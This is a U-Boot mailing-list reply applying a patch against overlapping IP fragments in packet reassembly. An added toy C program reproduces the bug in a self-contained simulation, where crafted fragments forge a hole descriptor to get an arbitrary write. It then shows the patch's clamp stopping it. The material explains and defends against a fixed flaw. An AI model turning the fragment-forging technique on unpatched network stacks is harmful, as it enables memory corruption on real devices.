[PATCH 7/6] net: deal with fragment-overlapping-two-holes case

Tom Rini trini at konsulko.com
Mon Nov 28 20:52:03 CET 2022


On Mon, Oct 17, 2022 at 09:52:51AM +0200, Rasmus Villemoes wrote:

> With a suitable sequence of malicious packets, it's currently possible
> to get a hole descriptor to contain arbitrary attacker-controlled
> contents, and then with one more packet to use that as an arbitrary
> write vector.
> 
> While one could possibly change the algorithm so we instead loop over
> all holes, and in each hole put as much of the current fragment as
> belongs there (taking care to carefully update the hole list as
> appropriate), it's not worth the complexity: In real, non-malicious
> scenarios, one never gets overlapping fragments, and certainly not
> fragments that would be supersets of one another.
> 
> So instead opt for this simple protection: Simply don't allow the
> eventual memcpy() to write beyond the last_byte of the current hole.
> 
> Signed-off-by: Rasmus Villemoes <rasmus.villemoes at prevas.dk>

Applied to u-boot/master, thanks!

-- 
Tom
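The attack and the fix described in the quoted commit message, as an added example that is not part of the original mail and is not U-Boot's net/net.c: a toy RFC 815-style reassembler that stores its hole descriptors inside the reassembly buffer and links them in a doubly linked list of 16-bit offsets. Everything in it is an assumption made for the demonstration: the buffer size (DGRAM_MAX), the "arena" that stands in for whatever follows the buffer in memory, the descriptor layout, the 8-byte fragment units, and the choice of the list unlink as the write primitive (the commit message says only that a corrupted descriptor becomes an arbitrary write vector, not which write). insert_fragment() with clamp == false copies the whole fragment, so a fragment that starts in one hole and runs into the next replaces that hole's descriptor with attacker bytes; with clamp == true the copy stops at the matched hole's last byte, which is the protection the patch adds.

```c
/* Added example, not U-Boot's net/net.c: a toy RFC 815 reassembler whose hole descriptors
 * live inside the reassembly buffer. Every name, size and offset is an assumption. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DGRAM_MAX  256               /* bytes of datagram being reassembled */
#define ARENA_SIZE (DGRAM_MAX + 64)  /* constructed: stands in for memory after the buffer */
#define NO_HOLE    0xFFFF

struct hole { uint16_t start, last, next, prev; };  /* all four are arena offsets */
struct reasm { uint8_t arena[ARENA_SIZE]; uint16_t first_hole; };

/* Bounds-checked accessors: a bug in the toy corrupts arena[] and nothing else. */
static uint16_t rd16(const struct reasm *r, uint16_t off)
{ uint16_t v = 0; if (off + 2 <= ARENA_SIZE) memcpy(&v, r->arena + off, 2); return v; }
static void wr16(struct reasm *r, uint16_t off, uint16_t v)
{ if (off + 2 <= ARENA_SIZE) memcpy(r->arena + off, &v, 2); }
static struct hole rd_hole(const struct reasm *r, uint16_t off)
{ struct hole h = { rd16(r, off), rd16(r, off + 2), rd16(r, off + 4), rd16(r, off + 6) }; return h; }
static void wr_hole(struct reasm *r, uint16_t off, struct hole h)
{ wr16(r, off, h.start); wr16(r, off + 2, h.last); wr16(r, off + 4, h.next); wr16(r, off + 6, h.prev); }

void reasm_init(struct reasm *r)
{
    struct hole all = { 0, DGRAM_MAX - 1, NO_HOLE, NO_HOLE };  /* one hole, descriptor at 0 */
    memset(r, 0, sizeof *r);
    wr_hole(r, 0, all);
}

/* Insert one fragment, matched to the single hole containing its first byte (the scheme the
 * commit message describes). Returns -1 (rejected), 0 (accepted) or 1 (datagram complete).
 * clamp == false: the copy may run past the matched hole (the bug);
 * clamp == true:  the copy stops at hole.last (the patch's protection). */
int insert_fragment(struct reasm *r, uint16_t start, uint16_t len, const uint8_t *data, bool clamp)
{
    uint16_t end, off = r->first_hole, replace;
    bool keep_front, keep_back;
    struct hole h;

    if (len == 0 || start % 8 || len % 8 || start + len > DGRAM_MAX)  /* 8-byte units: any hole holds a descriptor */
        return -1;
    end = start + len - 1;
    for (;;) {                                 /* walk the list to the hole the fragment starts in */
        if (off == NO_HOLE) return -1;         /* nothing left to fill there: drop it */
        h = rd_hole(r, off);
        if (start >= h.start && start <= h.last) break;
        off = h.next;
    }
    keep_front = start > h.start;              /* hole bytes left before the fragment */
    keep_back  = end < h.last;                 /* hole bytes left after it */
    replace = h.next;                          /* what the predecessor links to from now on */
    if (keep_front) {
        struct hole front = { h.start, start - 1, keep_back ? end + 1 : h.next, h.prev };
        wr_hole(r, h.start, front);
        replace = h.start;
    }
    if (keep_back) {
        struct hole back = { end + 1, h.last, h.next, keep_front ? h.start : h.prev };
        wr_hole(r, end + 1, back);
        if (!keep_front) replace = end + 1;
        if (h.next != NO_HOLE) wr16(r, h.next + 6, end + 1);               /* next->prev */
    }
    if (!keep_front) {                         /* old descriptor consumed: unlink it */
        if (h.prev == NO_HOLE) r->first_hole = replace;
        else wr16(r, h.prev + 4, replace);                                 /* prev->next */
        if (!keep_back && h.next != NO_HOLE) wr16(r, h.next + 6, h.prev);  /* next->prev */
    }
    if (clamp && end > h.last)
        len = h.last - start + 1;              /* never write beyond the hole we matched */
    memcpy(r->arena + start, data, len);       /* stays in the buffer: start + len <= DGRAM_MAX */
    return r->first_hole == NO_HOLE ? 1 : 0;
}

/* Constructed attack: A splits the initial hole in two; B starts in the first hole but is
 * 8 bytes too long, so its tail lands on the second hole's descriptor; C then "fills" the
 * forged hole and the unlink writes attacker-chosen values at attacker-chosen offsets. */
#define FORGED_PREV (DGRAM_MAX + 8)    /* both point past the datagram buffer */
#define FORGED_NEXT (DGRAM_MAX + 32)

int run_attack(struct reasm *r, bool clamp)
{
    uint8_t a[64], b[136], c[128];
    struct hole forged = { 128, 255, FORGED_NEXT, FORGED_PREV };

    reasm_init(r);
    memset(a, 'A', sizeof a); memset(b, 'B', sizeof b); memset(c, 'C', sizeof c);
    memcpy(b + 128, &forged, sizeof forged);   /* bytes 128..135 of B overwrite the descriptor at 128 */
    if (insert_fragment(r, 64, 64, a, clamp) < 0 || insert_fragment(r, 0, 136, b, clamp) < 0)
        return -1;
    return insert_fragment(r, 128, 128, c, clamp);
}

static void report(const char *tag, bool clamp)
{
    struct reasm r;
    int rc = run_attack(&r, clamp);
    printf("%s: rc=%d arena[%d]=0x%04x arena[%d]=0x%04x\n", tag, rc,
           FORGED_PREV + 4, rd16(&r, FORGED_PREV + 4), FORGED_NEXT + 6, rd16(&r, FORGED_NEXT + 6));
}

int main(void)
{
    report("unclamped", false);   /* forged next/prev values land outside the datagram */
    report("clamped  ", true);    /* neighbour data stays 0 and the datagram completes (rc=1) */
    return 0;
}
```

Build with `cc -std=c11 -Wall reasm.c` and run. In the unclamped run the third fragment is matched against the forged descriptor, so the unlink stores FORGED_NEXT at arena offset FORGED_PREV+4 and FORGED_PREV at FORGED_NEXT+6, both beyond the datagram; in the real code those offsets are whatever the attacker put in the packet. In the clamped run the second fragment's tail is simply discarded, the descriptor at 128 survives, and the datagram completes normally. Note that the clamp does not try to deliver the overlapping bytes to the hole they belong to; as the commit message says, legitimate senders never produce such fragments.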